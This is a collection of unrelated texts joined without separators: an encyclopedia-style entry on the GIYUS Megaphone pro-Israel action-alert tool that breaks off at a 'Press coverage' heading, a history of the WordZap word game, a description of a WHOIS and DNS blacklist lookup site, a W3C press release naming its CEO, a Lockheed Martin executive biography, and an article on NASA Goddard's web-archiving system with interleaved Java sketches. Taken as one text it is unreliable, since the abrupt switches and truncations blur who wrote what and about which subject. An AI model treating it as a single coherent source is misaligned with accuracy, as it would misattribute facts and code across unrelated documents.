Megaphone desktop tool
Screenshot of Megaphone Desktop Tool
The Megaphone desktop tool was a Windows "action alert" tool developed by Give Israel Your United Support (GIYUS) and distributed by the World Union of Jewish Students, the World Jewish Congress, The Jewish Agency for Israel, the World Zionist Organization, StandWithUs, Hasbara Fellowships, HonestReporting, and other pro-Israel public relations organizations. The tool was released in July 2006, during the 2006 Lebanon War. By June 2011 the tool was no longer available through the GIYUS website, although an RSS newsfeed is still available.[1][2][3][4][5][6][7]
Software
The Megaphone Desktop Tool acted as a wrapper around an RSS feed from the GIYUS website. Originally, it gave the user the option of going to a particular site with a poll; if the user chose to go to the site, the software then cast a vote automatically when this was technically feasible. That feature was later discontinued.
Giyus tries to save you the time and effort of locating the voting form inside the website, a seemingly simple task that may prove quite confusing at certain sites. Whenever we technically can we direct you straight to the voting action. If you have arrived at the poll results, it means that you were directed straight to the voting action and have already successfully voted. If for some reason you don't care to vote, you can always use the "No Thanks" link in the article alert popup. [8]
In later versions, the voting concept was removed entirely and the tool directed users to anti-Israel websites, giving users the option to click a button labeled "act now!", which would direct the user to a poll or email address.
The software license provides for remote updates: "You understand and agree that Giyus.Org may provide updates, patches and/or new versions of the Software from time to time, including automatic updates that will be installed on your computer, with notice to You, as needed to continue to use the Services, and You hereby authorize such installations." [9]
Press coverage
WordZap® The Addictionary
History
WordZap was first written for the Amiga in 1990 using C. There was an earlier game, WordHai, which was inspired by the game Shanghai which was a version of Mahjongg. A version of this game was commissioned for the Nintendo GameBoy by Mitsubishi (no longer making games). Since WordHai is a one-player game and the GameBoy can support two players, they asked for a two-player version. I did not think this was practical but I added a page on the back of the contract describing WordZap (not yet named). So then I had to write it!
The first version on the Amiga went live on two Amigas on Christmas day 1990. Our four children spent the next three days fighting over who would play, so it was clear we had a winner. The children started calling it WordZap and the name stuck.
Mitsubishi liked it so much they asked that it be a separate game and that I write a one-player version. I did this by simulating a second player. Both games were included in the GameBoy version which was eventually published by Jaleco in 1991 under the name WordZap which by then had been promoted to be the lead game.
Shortly after that a friend at Microsoft asked if I had any games for Windows. I quickly converted the Amiga version and the resulting game ended up in Microsoft Entertainment Pack III. Over the next eight years they sold 800,000 copies without ever changing it.
WordZap Deluxe
The original WordZap allowed two-player games using a null-modem cable. When the internet came along that seemed a better approach, so in 1997 WordZap was rewritten in C++ and the word length increased to six letters. A few years later "motifs" were added, and then seven-letter words in ten languages and keyboard input. The English dictionaries were enhanced to include legions of obscure words, and definitions were made available. When the graphics were updated the name was changed to WordZap Deluxe. I sold this new version myself over the internet for $25.
Classic WordZap
In 2000, when the Microsoft contract ended, it seemed time to clean the program up a bit. The code was rewritten in C++ and various missing words and other minor problems were fixed. I recoded the handicap system with the help of one really good player. The handicaps were set so he could get down to zero on a good day. The letter generation code was changed to make sure that one could make at least three words. The idea was to keep it very simple and small -- just one file of 160K compressed -- and to give it away to recruit players for WordZap Deluxe.
After 3 1/2 years it has become time to clean it up again. We have a prototype version for mobile phones and hope soon to port it to WindowsCE. You can download the new PC version here.
dawhois.com: Site Info, Whois, Traceroute, RBL Check, What's My IP
Would you like to get information for a domain name, host or IP address? WHOIS is a database service that allows Internet users to look up a number of matters associated with domain names, including the full name of the registrant of the domain name, the date when the domain was created, the date of expiration, the last record of update, the status of the domain, the names of the domain servers, the name of the hosting service, the IP address corresponding to the domain name, and the name of the registrar.
Would you like to find detailed information about a web site? Site Info is a webmaster tool which provides information about key areas across the website and about how a page is built. Site Info is a service that gathers detailed information about websites: general information, description, target keywords, tags, ranks, site response header, domain information, DNS information, host location, IPs etc.
Would you like to know your IP address? You need to know your IP address if you play online multiplayer games or want to use a remote connection to your computer.
Do you want to know why a website or IP address is unreachable and where the connection fails? Trace Route is a webmaster tool with capabilities to show how information travels from one computer to another. Trace Route will list all the computers the information passes through until it reaches its destination. Traceroute identifies each computer on that list by name and IP address, and the amount of time it takes to get from one computer to another. If there is an interruption in the transfer of data, the Traceroute will show where in the chain the problem occurred.
DNS Black List Checker
Would you like to know if a web site or IP address is listed in a multi-DNS blacklist or Real-time Blackhole List? The RBL tool searches by IP address the database of the Domain Name System blacklist (DNSBL) and the Real-time Blackhole List (RBL). The RBL displays the server IP addresses of internet service providers whose customers are responsible for spam. If a web site has IP addresses in a DNSBL or RBL, it can be invisible to customers of Internet Service Providers (ISPs) that use a DNSBL or RBL to stop the proliferation of spam.
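As a rough illustration of how such a lookup works under the hood (not code from the dawhois service), a DNSBL query reverses the IPv4 octets, prepends them to the blacklist zone, and resolves the resulting name: an answer means the address is listed, while a name-not-found error means it is not. The zone and test address below are only examples.

```java
import java.net.InetAddress;
import java.net.UnknownHostException;

public class DnsblCheck {

    // Returns true if the IPv4 address is listed in the given DNSBL zone.
    // Example: 203.0.113.7 checked against "zen.spamhaus.org" becomes a
    // lookup of 7.113.0.203.zen.spamhaus.org.
    static boolean isListed(String ipv4, String zone) {
        String[] o = ipv4.split("\\.");
        String query = o[3] + "." + o[2] + "." + o[1] + "." + o[0] + "." + zone;
        try {
            InetAddress.getByName(query);   // any A record means "listed"
            return true;
        } catch (UnknownHostException e) {  // name not found means "not listed"
            return false;
        }
    }

    public static void main(String[] args) {
        // 127.0.0.2 is the conventional "always listed" test address for most DNSBLs.
        System.out.println(isListed("127.0.0.2", "zen.spamhaus.org"));
    }
}
```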
Dr. Jeffrey Jaffe Named W3C CEO
http://www.w3.org/ — 8 March 2010 —
W3C today named Dr. Jeffrey Jaffe its new Chief Executive Officer.
Dr. Jaffe brings to the role extensive global leadership experience in
the Information Technology industry, including as President of Bell Labs
Research and Advanced Technologies at Lucent Technologies; as Vice
President of Technology for IBM; and most recently as Executive Vice
President, products, and Chief Technology Officer at Novell. In these
positions he has combined business leadership and vision with
technical expertise, and demonstrated strong support for open standards and open source.
"Web technologies continue to be the vehicle for every industry to
incorporate the rapid pace of change into their way of doing
business," said Dr. Jaffe. "I'm excited to join W3C at this time of
increased innovation, since W3C is the place where the industry comes
together to set standards for the Web in an open and collaborative
fashion."
As W3C CEO, Dr. Jaffe will work with Director Tim Berners-Lee, staff,
Membership, and the public to evolve and communicate W3C's
organizational vision. The CEO is responsible for W3C's global
operations, for maintaining the interests of all of the W3C’s
stakeholders, and for sustaining a culture of cooperation and
transparency, so that W3C continues to be the leading forum for the
technical development and stewardship of the Web.
W3C's initiatives — including HTML 5 and other Web Applications
technology, Semantic Web, Mobile Web, Accessibility, and
Internationalization — are all designed to make the Web a powerful
tool for commerce, collaboration, and creativity. As more people connect
to the Web using a wider variety of devices, and as the world increases its
reliance on the Internet ecosystem, W3C is poised to enter a new phase
of organizational evolution.
"Jeff has outstanding leadership and business skills to help address
a wealth of arising opportunities," said Tim Berners-Lee. "Just as the Web is constantly growing and changing,
so is the community around it and so is the Consortium.
Jeff's broad experience gives him a deep understanding of many different types of
organizations, which will be invaluable in managing W3C's evolution."
Dr. Jaffe plans to blog regularly on the W3C CEO Blog, beginning with his first post on reflections of a new W3C CEO. More about Dr. Jaffe is available on his home page.
About the World Wide Web Consortium
The World Wide Web Consortium (W3C) is an international consortium where
Member organizations, a full-time staff, and the public work together to
develop Web standards. W3C primarily pursues its mission through the creation
of Web standards and guidelines designed to ensure long-term growth for the
Web. Over 350 organizations are Members of the Consortium.
W3C is jointly run by the MIT Computer
Science and Artificial Intelligence Laboratory (MIT CSAIL) in the USA, the
European Research Consortium for Informatics
and Mathematics (ERCIM) headquartered in France and Keio University in Japan, and has additional
Offices worldwide. For more
information see http://www.w3.org/
Contact Americas, Australia —
Ian Jacobs, <[email protected]>,
Contact Europe, Africa and the Middle East —
Marie-Claire Forgue, <[email protected]>, +33 6 76 86 33 41
Contact Asia —
Naoko Ishikura, <[email protected]>,
+81.466.49.1170
Brigadier General Velma L. Richardson, U.S. Army, Retired
Brigadier General Velma "Von" Richardson, U.S. Army Retired, is vice president of Department of Defense Information Technology (DoD IT) Programs at Lockheed Martin in Washington, D.C. In this role, she supports Washington-based DoD Chief Information Officers and other IT leaders in identifying priorities, increasing program visibility, taking new technology directions and recommending innovative IT solutions. Richardson manages executive branch customer relationships with the senior leaders in the U.S. Military, Defense Information Systems Agency and Office of the Secretary of Defense. In addition, she assists Lockheed Martin business units with customer relations and helps program managers overcome funding challenges to develop cost-effective and competitive proposals. During the past two years, Richardson has focused on corporate priority and key DoD IT programs including U.S. Army Corps of Engineers IT services, ITES-2S, ENCORE II, CR2, ITA, Global Military Mail, OPTARSS, CENTCOM (U.S. Central Command) and AFRICOM (U.S. Africa Command). A strong advocate for Warfighter information technology and systems, Richardson is following the DoD’s new Stability Operations role. Richardson is a member of Lockheed Martin’s Joint and Army Customer Focus Teams and AFRICOM Integrated Product Team. In addition, she serves on the board of directors for The ROCKS, Inc., an organization dedicated to the professional development of the U.S. officer corps. Before joining Washington Operations, Richardson served as vice president and DoD customer relations executive at Lockheed Martin Information Technology.
Richardson attended the U.S. Army War College at Carlisle Barracks, Pennsylvania, from 1993 to 1994. She received a Master of Arts degree from Pepperdine University in Human Resources Management.
ISSN 1082-9873
Archiving and Accessing Web Pages
The Goddard Library Web Capture Project
Alessandro Senserini and Robert B. Allen
University of Maryland, College of Information Studies
Gail Hodge, Nikkia Anderson, and Daniel Smith, Jr.
Information International Associates, Inc. (IIa)
NASA Goddard Space Flight Center Library
Point of Contact: Gail Hodge, <[email protected]>
The NASA Goddard Space Flight Center (GSFC) is a large engineering enterprise, with most activities organized into projects. The project information of immediate and long-term scientific and technical value is increasingly presented in web pages on the GSFC intranet. As part of its knowledge management initiatives, the GSFC Library has developed the Digital Archiving System to capture and archive these pages for future use. The system is based on standards and open source software, including the Open Archives Initiative-Protocol for Metadata Harvesting, Lucene, and the Dublin Core. Future work involves expanding the system to include other content types and special collections, improving automatic metadata generation, and addressing challenges posed by the invisible and dynamic web.
In 2001, the NASA Goddard Space Flight Center (GSFC) Library began investigating ways to capture and provide access to internal project-related information of long-term scientific and technical interest. These activities were coincident with NASA GSFC's enterprise-wide emphasis on knowledge management. This project information resides in a number of different object types, including videos, project documents such as progress reports and budgets, engineering drawings and traditional published materials such as technical reports and journal articles. Increasingly, valuable project information is disseminated on the GSFC intranet as web sites. These web sites may be captured as part of wholesale, periodic intranet "snapshots" or when making backups for disaster recovery. However, these copies are not made with the purpose of long-term preservation or accessibility. Therefore, the sites on the GSFC intranet are subject to much the same instability as public Internet web sites: sites that have been moved, replaced or eliminated entirely. The goal of the Web Capture project is to provide a web application that captures web sites of long-term scientific and technical interest, stores them, extracts metadata, if possible, and indexes the metadata in a way that the user can search for relevant information.
2.0 Analytical Approach
In 2001 and 2002, the GSFC Library investigated the feasibility of capturing selected GSFC intranet sites. The first activity was to review the literature and determine the state of the practice in web capture. Projects such as the EVA-Project in Finland [1], Kulturarw3 in Sweden [2] and PANDORA in Australia [3] were reviewed. Information was gathered from the Internet Archive [4] regarding its approaches. These and other projects are well documented by Day [5].
However, the GSFC requirements differ from those of national libraries or the Internet Archive, because the set of documents is at once more limited in scope and broader than those of interest to these organizations. Most national libraries are concerned with archiving and preserving the published literature of a nation or capturing cultural heritage. This allows the national library to establish algorithms like those developed in Sweden to capture sites with the specific country domain (e.g., "se" for Sweden) or those that are about Sweden but hosted in another country. National libraries (such as Australia) are concerned about electronic journals, books or other formally published materials that are disseminated only in electronic form via the Internet. However, GSFC is interested in a wide range of content types including project documentation such as progress reports, budgets, engineering drawings and design reviews; web sites, videos, images and traditional published materials such as journal articles, manuscripts and technical reports.
Unlike the Internet Archive, GSFC is concerned about a small selective domain for which proper access restrictions and distribution limitations are as important as the original content itself. The goal was to capture content of scientific and technical significance rather than information from human resources or advertisements from the employee store. Therefore, a mechanism that captured the whole domain was inappropriate. The GSFC system needed to be more selective; yet that selection could not be based solely on an analysis of the domain components as represented in the URL. This led to the realization that there would need to be some manual web site selection involved. However, the desire was to keep this to a minimum. The result is a hybrid system that combines aspects of many of the projects reviewed while addressing the unique requirements of the GSFC environment.
3.0 System Flow
The hybrid system consists of a combination of human selection, review, and automated techniques based on off-the-shelf software, custom scripts, and rules based on an understanding of the GSFC project domain. The system flow is presented in Figure 1 below. The following sections describe each step in the flow.
Figure 1: Web Capture System Flow
3.1 Web Site Selection
At GSFC the scientific and technical mission, and the generation of related information (other than that maintained by the Library or prepared for public outreach and education), is centered in four directorates. Based on this knowledge of the GSFC environment, the selection of GSFC URLs began with the homepages for the Space Sciences, Earth Sciences, Applied Engineering and Technology, and Flight Programs and Projects directorates. The higher-level sites, in most cases the homepages for the directorates, were selected manually, along with the next two levels in a direct path, eliminating those pages with non-scientific information such as phone directories and staff-related announcements. These selected URLs became the root URLs for the capture process. The analyst entered the URLs into an Excel spreadsheet along with some characteristics of the site, including a taxonomy of link types; the code number for the directorate; the year the site was last modified; the intended audience for the site; the level from the homepage; whether or not the site contains metatags; and anticipated problems when spidering, such as dynamic images or deep web database content. This initial analysis provided important information about how to collect the sites. It identified anomalies that required human intervention, outlined requirements for the spidering software and provided statistics for the estimation of storage requirements for the captured sites. The spreadsheet created by the analyst became a checklist for the technician who launched and monitored the automated capture process. The technician transferred the spreadsheet back to the analyst after the capture process was completed in order to identify the metadata records to be reviewed and enhanced.
3.2 Web Site Capture
3.2.1 Spidering Software
A major objective of the early testing was to identify the spidering software that would meet the requirements of the project. At the beginning of this prototype, another concern was the cost. The search engines used for searching the GSFC intranet can index web pages, but they do not capture the actual sites. There was a limited selection of commercially available software to be used for the capture process. For the purposes of this prototype, the GSFC Library selected the Rafabot 1.5© [6]. It is a bulk web site downloading tool that allows limited parameter setting and provides searchable results in organized files.
3.2.2 Capture Parameters
Parameters were set to ensure inclusion of most pages in the web sites while controlling the resulting content. The key parameters available in Rafabot include the number of levels for the crawl based on the root URL as the starting point, the domains to be included or excluded, file sizes, and mime or format types. The parameters were set to capture the content of pages from the root URL down three levels. While this setting does not result in the capture of all pages in a web site, it prevents the spidering tool from becoming circuitous and wandering into parts of the sites that are administrative in nature. The spider is set to capture only pages in the Goddard domain, because pages outside the GSFC domain (made available by contractors and academic partners) may have copyrighted information or access restrictions. Sites with .txt, .mpeg and .mdb extensions were also eliminated from the crawl. Early testing showed that the majority of these sites are extremely large datasets, large video files and software products. While these objects meet the criteria regarding long-term scientific interest, the spidering time and storage space required were prohibitive. In addition, many of these objects, such as the datasets, are already managed by other archives at GSFC, such as the National Space Science Data Center. In order to be more selective about these formats, future work will address how to establish agreements with parts of the GSFC organization to link to these objects while they physically remain in the other data archives on the center.
3.2.3 The Capture Process
The selected root URLs identified by the analysis described above were submitted to the capturing software. This may be done individually or as a text file in batch. Rafabot creates a folder with a name similar to the spidered URL, containing all the web pages captured. Each web page crawled has the name in lowercase, slash characters in the name are replaced with underscore characters, and sometimes the order of the words changes. These transformations occur because Rafabot changes all the hyperlinks in the HTML code of the pages captured to allow navigability off-line. The tool does not mirror the structure of the web site with all its directories, but it creates one folder with all the web pages contained in it.
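Rafabot's internals are proprietary, so purely as an illustrative sketch, the restrictions described above (a crawl three levels deep from each root URL, confined to the Goddard domain, skipping .txt, .mpeg and .mdb files) could look roughly like the following. The jsoup parser and the host-name pattern are assumptions, not part of the project's actual tooling.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import java.util.HashSet;
import java.util.Set;

public class CaptureSketch {
    private static final int MAX_DEPTH = 3;                      // root URL plus three levels down
    private static final Set<String> SKIP_EXTENSIONS = Set.of(".txt", ".mpeg", ".mdb");

    private final Set<String> visited = new HashSet<>();

    public void crawl(String url, int depth) {
        if (depth > MAX_DEPTH || !visited.add(url)) return;       // depth limit, no revisits
        if (!url.contains("gsfc.nasa.gov")) return;               // stay inside the GSFC domain (assumed host pattern)
        String lower = url.toLowerCase();
        for (String ext : SKIP_EXTENSIONS) {
            if (lower.endsWith(ext)) return;                      // skip large dataset, video and database files
        }
        try {
            Document page = Jsoup.connect(url).get();             // fetch and parse the page
            // ... write page.outerHtml() into the capture folder here ...
            for (Element link : page.select("a[href]")) {
                crawl(link.absUrl("href"), depth + 1);            // follow links one level deeper
            }
        } catch (Exception e) {
            // dead links and non-HTML responses are simply skipped in this sketch
        }
    }
}
```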
3.3 Creating the Metadata Database
Metadata creation includes three main components: the metadata scheme, automatic metadata extraction, and human review and enhancement of the metadata. The Web Capture application runs on a Linux platform and has been developed in the Java programming language, including Java Servlet and Java Server Pages (JSP) technologies. This combination allows the developer to separate the application logic, usually implemented with servlets, from the presentation aspect of the application (JSP). Servlet and JSP technologies, with the addition of Jakarta Tomcat (servlet engine), provide a platform to develop and deploy web applications.
3.3.1 The Goddard Core Metadata Scheme
As part of a larger project to collect, store, describe and provide access to project-related information within the GSFC community and to make it available via a single search interface, the GSFC Library developed the Goddard Core Metadata Element Set, based on the qualified Dublin Core [7]. The primary emphasis of this element set is on resource discovery and evaluation, i.e., helping the user find the document, evaluate its usefulness and locate it whether in paper or in digital form. The Goddard Core Metadata Set was specifically developed to provide better discovery and evaluation in the Goddard context of project management. The extensions to the Dublin Core include important information related to projects such as the Instrument Name, the Project Name, the GSFC Organizational Code, and the Project Phase. The Goddard Core Metadata Set is described in detail in an upcoming publication [8]. The element set is also available online [9].
3.3.2 Automatic Metadata Creation
Once the Goddard Core Metadata Set was defined, the Digital Archiving Team established mechanisms for creating skeleton records using a series of off-the-shelf and homegrown scripts. When a collection of web pages is submitted through the user interface, the application processes the home page and parses it to extract metadata that can be related to all the web pages included in the crawling results for that root URL. A candidate metadata record is created from three different processes: automatic extraction of common metatags, extraction of GSFC-specific metatags, and "inherited" metadata content from higher-level pages.
The Web Data Extractor© (WDE) [10] is a tool used to help in creating metadata. Given a URL, it extracts metadata information from the web page by parsing the HTML for common metatags. These tags include title, description, keywords, last modified date and content length. A text file with the metadata is created. However, many of these metatags are not routinely used on GSFC web sites. For non-HTML ("binary") web pages, the application extracts only the format (from the file name suffix or MIME type) of the web page in order to fill the 'Format' field of the Goddard Core. The GSFC Web Guidelines require a minimum set of HTML metatags for the first and second level pages of a web site. The metatags include the standard tags like title and keywords, but they also include GSFC-specific metatags like 'orgcode' (organization code within the Goddard Space Flight Center), 'rno' (Responsible NASA Official), 'content-owner', 'webmaster', and the more common 'description' metatags. A script extracts these elements from the HTML. In addition, the contents of many of the metadata elements for lower-level pages can be inherited from the related higher-level pages. These elements include Organization and Organization Code. This inherited content is used to fill these elements unless content specific to the lower-level page is available based on the metatag extraction processes.
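The project relied on the commercial Web Data Extractor plus in-house scripts for this step. Purely as an illustration of the kind of metatag extraction described, the sketch below pulls the common tags and the GSFC-specific tags named above out of a captured HTML file using the jsoup parser; the choice of jsoup is an assumption.

```java
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import java.io.File;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

public class MetatagExtractor {

    // Build a skeleton metadata record from one captured HTML page.
    static Map<String, String> extract(File htmlFile) throws Exception {
        Document doc = Jsoup.parse(htmlFile, "UTF-8");
        Map<String, String> record = new LinkedHashMap<>();
        record.put("title", doc.title());

        // Common metatags plus the GSFC-specific ones named in the Web Guidelines.
        for (String name : List.of("description", "keywords", "orgcode", "rno",
                                   "content-owner", "webmaster")) {
            String value = doc.select("meta[name=" + name + "]").attr("content");
            if (!value.isEmpty()) {
                record.put(name, value);
            }
        }
        return record;
    }
}
```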
3.3.3 Creating the Metadata Records
The metadata extracted and extrapolated by the application are merged with the metadata provided by the Web Data Extractor (WDE). Since the punctuation of the URLs has been changed, this is done by parsing the original URL from WDE and the name of the page from Rafabot into tokens or smaller units, which are then matched against each other. This method works for HTML pages but is problematic for non-HTML pages since it is difficult to find a match without the original URL. Following the merge, the resulting metadata is mapped to the Goddard Core elements. The metadata information and other pertinent information about web pages are stored in a MySQL relational database. The web pages themselves are stored directly in the file system.
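The article does not show the matching logic itself; the sketch below illustrates the general idea of tokenizing an original URL and a Rafabot-style file name and scoring their overlap. The scoring formula and the sample names are illustrative assumptions.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class NameMatcher {

    // Split a URL or a Rafabot-style file name (lower-cased, slashes replaced by
    // underscores, word order possibly changed) into tokens for comparison.
    static Set<String> tokens(String s) {
        return new HashSet<>(Arrays.asList(s.toLowerCase().split("[/_.:\\-]+")));
    }

    // Score the overlap between the original URL reported by WDE and a captured
    // file name; the pair with the highest overlap is treated as the same page.
    static double overlap(String originalUrl, String capturedName) {
        Set<String> a = tokens(originalUrl);
        Set<String> b = tokens(capturedName);
        Set<String> common = new HashSet<>(a);
        common.retainAll(b);
        return (double) common.size() / Math.max(1, Math.min(a.size(), b.size()));
    }

    public static void main(String[] args) {
        System.out.println(overlap("http://library.gsfc.nasa.gov/projects/index.html",
                                   "projects_library_gsfc_nasa_gov_index.html"));
    }
}
```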
3.3.4 Editing and Enhancing the Metadata Records
Once the candidate metadata information is stored in the database, the Goddard Core Metadata Template allows the cataloger to review, modify and enhance the Goddard Core elements (Figure 2). The analyst accesses the record by the record number provided automatically on a web page created by the metadata creation process. The URL allows the analyst to reference the spreadsheet developed at the beginning of the selection process to look for problematic components such as dynamically generated parts of the page.
Figure 2: Goddard Core Metadata Template for Metadata Review/Enhancement
The analyst also corrects or enhances the metadata. Every input box of the form has plus and minus buttons to add or delete instances of an element. Any element, except the record ID assigned by the system, can be edited. Controlled vocabulary terms, a text description and free text keywords are added manually during the review process. Some elements, such as the subject.competencies element, have values selected from controlled vocabularies accessible with dropdown menus. (At this point, all elements are optional and repeatable, but future work will establish a set of mandatory elements based on the requirements for preservation and the GSFC Web Guidelines for meta-tagging.)
3.4 Searching the Metadata Records
Lucene [11] is an open source search engine technology used to index and search the metadata. This technology allows storing, indexing and/or tokenizing the different values of the Goddard Core elements. When an element is tokenized, the text is processed by an analyzer that strips off stop words like "a", "the", "and", which are not relevant, converts the text to lowercase and makes other optimizations before the text is indexed. In this context Lucene indexes and searches only the metadata from the database, but Lucene could be set up to index the full text of the pages (HTML, XML, etc.) or other document formats (Word, PDF, etc.) if tools to extract text from them exist.
The search form allows the user to enter terms and select specific metadata elements of the Goddard Core on which to search (Figure 3). Current searchable fields include: title, description, keyword, subject.competencies, creator.employee, creator.code and others. The Subject element has two subcategories: NASA Taxonomy and Earth Observing System Taxonomy. Each taxonomy has a controlled vocabulary that appears on the form as a drop-down menu.
Figure 3: Search Page
When a search is executed, the results are paged and displayed in a table that contains basic information to allow the user to evaluate the resulting hits (Figure 4). In the prototype, these fields include the Title, Subject (taken from a controlled list of NASA Competences or Disciplines), Creator (the author), and Code (the GSFC code with which the author is affiliated).
Figure 4: Results Page
The web page is displayed by clicking on the magnifying glass under "View". This option opens a new resizable window to allow navigation and better examination of the content. The full metadata record is viewed by clicking on the symbol under "Metadata". In addition, the user can preview the digital object in a small size pop-up window by moving the mouse over the corresponding field of the "Preview" column.
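The indexing and fielded searching described in Section 3.4 can be sketched in a few lines of Lucene code. The sketch below uses a present-day Lucene API rather than the 2004-era release the project ran on, and the field values are invented examples; only the field names come from the article.

```java
import org.apache.lucene.analysis.standard.StandardAnalyzer;
import org.apache.lucene.document.*;
import org.apache.lucene.index.*;
import org.apache.lucene.queryparser.classic.QueryParser;
import org.apache.lucene.search.*;
import org.apache.lucene.store.*;
import java.nio.file.Paths;

public class MetadataIndex {
    public static void main(String[] args) throws Exception {
        Directory dir = FSDirectory.open(Paths.get("goddard-core-index"));
        StandardAnalyzer analyzer = new StandardAnalyzer();   // tokenizes and lower-cases terms

        // Index one metadata record; TextField values are tokenized and searchable by word.
        try (IndexWriter writer = new IndexWriter(dir, new IndexWriterConfig(analyzer))) {
            Document doc = new Document();
            doc.add(new TextField("title", "Web Capture Project Status Report", Field.Store.YES));
            doc.add(new TextField("description", "Progress report for the intranet capture prototype", Field.Store.YES));
            doc.add(new StringField("creator.code", "290", Field.Store.YES)); // stored, not tokenized
            writer.addDocument(doc);
        }

        // Search a single Goddard Core element, as the search form does.
        try (IndexReader reader = DirectoryReader.open(dir)) {
            IndexSearcher searcher = new IndexSearcher(reader);
            Query q = new QueryParser("title", analyzer).parse("capture");
            for (ScoreDoc hit : searcher.search(q, 10).scoreDocs) {
                System.out.println(searcher.doc(hit.doc).get("title"));
            }
        }
    }
}
```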
4.0 Challenges and Opportunities for Future Work
This prototype has identified several challenges and opportunities for future efforts. These can be grouped into technical issues related to the web capture, integration with other systems, and extension of the types of digital objects that are included in the system. Some of these activities are already underway, as funding has been identified.
4.1 Technical Issues Related to Web Capture
The technical issues related to capturing web sites are well documented by Day [5]. While Day is addressing the more general issues related to the capture of web sites from the public Internet, many of these issues and others occur in an intranet environment.
We encountered several problems when performing the crawl on the increasingly complex scientific web sites. The most common problem resulted from the increasingly dynamic nature of those web sites. This includes content that is controlled by Javascript and Flash technologies, and dynamic content driven from database queries or content management systems. The crawling tool is unable to crawl a web page containing a search form that queries a database. The "deep or invisible web" is difficult to capture automatically, and there is a need to develop customized software that is able to do this programmatically. Through a related project funded by the GSFC Director's Discretionary Fund, in a partnership with the Advanced Architectures and Automation Branch, the challenges regarding the capture of the invisible and dynamic web were evaluated in more detail, and some preliminary thoughts about how to deal with this problem were explored. The project team has also made contact with other groups working on this issue including the Internet Archive and an international group of national libraries [12].
There were also cases where additional viewer software, such as that required for some 3-D models, was needed in order to provide full functionality. Based on these problems, we identified alternative spidering tools during the course of the project. We believe that tools like WebWhacker© [13] or BackStreet© [14] may provide better results in crawling web pages containing dynamic scripts. Future implementations will test these other tools. We will continue to research better tools for the capturing of web sites and to work with others on the issues related to the capturing of deep and dynamic web content. In order to balance the size and scope of the resulting capture files, some web sites that go to many levels are cut off by the level parameter that was chosen. By analyzing the number of dead-end links when the initial capture is performed, the system could alert the technician that a particular site needs to be recaptured with a parameter that captures sites to more levels.
A major concern for full-scale implementation of such a web capturing system is the degree of manual intervention required to select sites. A more automated method for identifying the sites of scientific and technical interest is needed. For example, terms that occur frequently in non-scientific web sites, such as sites that focus on Human Resources, could be used to exclude these sites from the selection and capture process. More automatic metadata creation will require additional analysis of the web content and more complex rules based on the GSFC environment. HTML is the main language used on the web, but web pages are also represented in other formats like PDF, Word, PowerPoint, and different image formats. Automatic metadata generation is gaining more importance in the field of information retrieval, and there are several open source tools that extract metadata from files other than HTML. For example, ImageMagick [15], a package of utilities to manipulate image data, could be used to retrieve information about the size and resolution of an image. Wordview converts Word documents to HTML or other formats [16]. Extracting metadata from PDF files is particularly important, since most of the project documents are delivered in PDF format. Several tools for converting PDF files to simple text and extraction of metadata headers from PDF files were investigated [17]. This has not been successful to date because of the instability of the software and the variety of PDF versions in the collection.
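Reference [17] points to PDFBox, one of the PDF tools investigated. As a rough sketch of what extracting PDF metadata headers looks like with a later (2.x) PDFBox API, using a hypothetical file name:

```java
import org.apache.pdfbox.pdmodel.PDDocument;
import org.apache.pdfbox.pdmodel.PDDocumentInformation;
import org.apache.pdfbox.text.PDFTextStripper;
import java.io.File;

public class PdfMetadata {
    public static void main(String[] args) throws Exception {
        // "project-report.pdf" is a placeholder file name.
        try (PDDocument doc = PDDocument.load(new File("project-report.pdf"))) {
            PDDocumentInformation info = doc.getDocumentInformation();
            System.out.println("Title:    " + info.getTitle());
            System.out.println("Author:   " + info.getAuthor());
            System.out.println("Keywords: " + info.getKeywords());
            System.out.println("Created:  " + info.getCreationDate());

            // Plain text from the first page could feed keyword extraction or full-text indexing.
            PDFTextStripper stripper = new PDFTextStripper();
            stripper.setEndPage(1);
            System.out.println(stripper.getText(doc));
        }
    }
}
```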
While there are many avenues for continued development of automated metadata creation in the GSFC intranet environment, it is unlikely that all elements can be created in a completely automatic fashion. For this reason, the GSFC Library has begun working with the webmasters and the authors of web-based objects to encourage the incorporation of compliant metadata in their web pages and the development of tools, applications and training to facilitate the inclusion of metadata when digital objects are created.
4.2 Integrating the Web Capture with Other Systems
In order to improve the system's interoperability, the GSFC Library has implemented the Open Archives Initiative Protocol for Metadata Harvesting (OAI-PMH) v. 2.0 [18]. The implementation consists of a network-accessible server able to process the six OAI-PMH requests, expressed as HTTP requests, and return the search results in XML format. The server currently acts as a "data provider" as defined in the OAI-PMH framework. The OAI-PMH could be used to contribute to larger metadata repositories either on-center, across NASA or through other consortia. In addition, the OAI-PMH could be used as a "data harvester" to integrate web site searching with other digital objects.
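On the harvesting side, a client issues one of the six OAI-PMH verbs as an ordinary HTTP request and parses the XML response. The sketch below lists Dublin Core titles from a ListRecords response; the base URL and set name are hypothetical, and a real harvester would also follow resumptionTokens when a result set spans multiple responses.

```java
import java.io.InputStream;
import java.net.URL;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

public class OaiHarvestSketch {
    public static void main(String[] args) throws Exception {
        // Hypothetical base URL and set name for illustration only.
        String request = "http://library.gsfc.nasa.gov/oai/provider"
                + "?verb=ListRecords&metadataPrefix=oai_dc&set=webcapture";

        try (InputStream in = new URL(request).openStream()) {
            DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
            dbf.setNamespaceAware(true);                       // needed for the dc: namespace lookup
            Document response = dbf.newDocumentBuilder().parse(in);

            NodeList titles = response.getElementsByTagNameNS(
                    "http://purl.org/dc/elements/1.1/", "title");
            for (int i = 0; i < titles.getLength(); i++) {
                System.out.println(titles.item(i).getTextContent());
            }
        }
    }
}
```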
4.3 Extending the System to Handle Other Digital Objects
During the development of the Web Capture System, opportunities for integrating the access to the web sites captured in this project with other digital knowledge assets were identified. Projects to capture digital images, streaming media from scientific colloquia and lecture series held on center, and digital versions of more traditional project documents were initiated. Similar to the Web Capture System, other systems were developed to archive these digital objects with metadata in commercial, third-party or home-grown systems. OAI, XML and the Goddard Core are the mechanisms for bringing the metadata into a central repository for searching across diverse digital objects (Figure 5).
Figure 5: Central Metadata Repository for Diverse Digital Objects
